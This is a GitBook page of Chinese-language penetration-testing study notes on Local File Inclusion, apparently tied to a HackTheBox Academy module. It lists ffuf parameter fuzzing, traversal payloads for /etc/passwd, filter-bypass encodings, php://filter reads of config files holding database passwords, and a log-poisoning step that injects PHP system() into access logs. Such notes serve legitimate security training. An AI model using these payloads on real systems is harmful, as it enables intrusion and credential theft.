0xdfxyz
  • Penetration Testing Process
    • README.md
    • Whois
  • Nikto
  • Search Engine Discovery
  • FinalRecon
  • Nessus
  • 0_新手上路
    • 0_新手上路
  • 1_訊息收集
    • 服務枚舉
      • Page 6
      • Nmap
      • DNS
    • 應用枚舉
      • Page 6
    • A D枚舉
      • Page 6
    • web枚舉
      • Page 6
      • Web Fuzzing
      • Subdomain
  • 2_漏洞前準備
    • 反彈 Shell
    • 工具彙總
    • 字典生成
  • 3_漏洞利用
    • 應用漏洞利用
    • AD 攻擊
    • 二進位漏洞利用
    • Web漏洞利用
      • XSS
      • IDOR
      • Webshel​​l
      • File uploads
      • SSTI
      • LFI
      • SQL injection
      • XXE
      • HTTP Verb Tampering
      • Command Injection
    • 服務漏洞利用
      • CMS
        • Wordpress
        • Joolmla
        • Drupal
      • Servlet 容器/軟體開發
        • Jenkins
        • Tomcat
      • 基礎設施/網路監控工具
        • Splunk
        • PRTG Network Monitor
      • 客戶服務管理與配置管理
        • osTicket
        • Gitlab
      • 通用網關介面
        • 攻擊通用網關介面 (CGI) 應用程式 - Shellshock
      • 其他應用
        • ColdFusion
        • IIS Tilde
        • LDAP
      • 常見應用程式
        • Thick client(也稱為rich客戶端或fat客戶端
        • Web 批量分配漏洞 ( Ruby on Rails)
        • 攻擊連接到服務的應用程式(SSH)
  • 4_滲透
    • Linux 權限提升
    • Windows 權限提升
    • Windows + Linux 工具
  • 5_橫向移動
    • 工具
    • 跳板 Pivoting
    • AD 橫向移動
    • Linux 橫向移動
    • Windows 橫向移動
  • 6_NetExec
    • 常見模組
    • 命令執行
    • 漏洞掃描模組
    • 模組使用
    • 憑證轉儲
    • Kerberos 認證
    • LDAP RDP 枚舉
    • SMB 枚舉
由 GitBook 提供支持
在本页
  • 1. 發現點
  • 2. 測試Payload
  • 3. bypass技巧
  • 4.濫用
  • 6.Skills Assessment

这有帮助吗?

  1. 3_漏洞利用
  2. Web漏洞利用

LFI

1. 發現點

  1. ?page參數

  2. ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

2. 測試Payload

發現可能的 LFI 參數後,例如 ?page=,我們可以使用 Jhaddix 的 LFI 字典 來進行自動化測試:

ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

🔹 基本 LFI 測試

?page=/proc/self/environ      #for dokcer
?page=../../../../etc/passwd

🔹 Docker 內部 LFI 測試

?page=/proc/self/environ

🔹 讀取 Apache 環境變數

curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars

3. bypass技巧

🔹 變形 ../

?page=....//....//etc/passwd
?page=....\/....\/etc/passwd
?page=....//....//....//....//etc/passwd

🔹 URL 編碼

?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd
?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd

🔹 Null Byte 截斷

?page=../../../../etc/passwd%00

🔹 測試不同 Web Root

ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

🔹 php base64 filter

 /index.php?language=php://filter/read=convert.base64-encode/resource=config	

4.濫用

🔹 讀取 PHP 配置(可能包含 DB 密碼)

?page=/var/www/html/config.php
?page=../../../../var/www/html/wp-config.php

🔹 Base64 讀取 PHP 代碼

/index.php?language=php://filter/read=convert.base64-encode/resource=config
echo "BASE64_OUTPUT" | base64 -d

🔹 日誌汙染(Log Poisoning)

curl "http://<SERVER_IP>:<PORT>/?page=<?php system('id'); ?>"

然後訪問:

?page=/var/log/apache2/access.log

6.Skills Assessment

上一页SSTI下一页SQL injection

最后更新于2个月前

这有帮助吗?

https://academy.hackthebox.com/module/23/section/513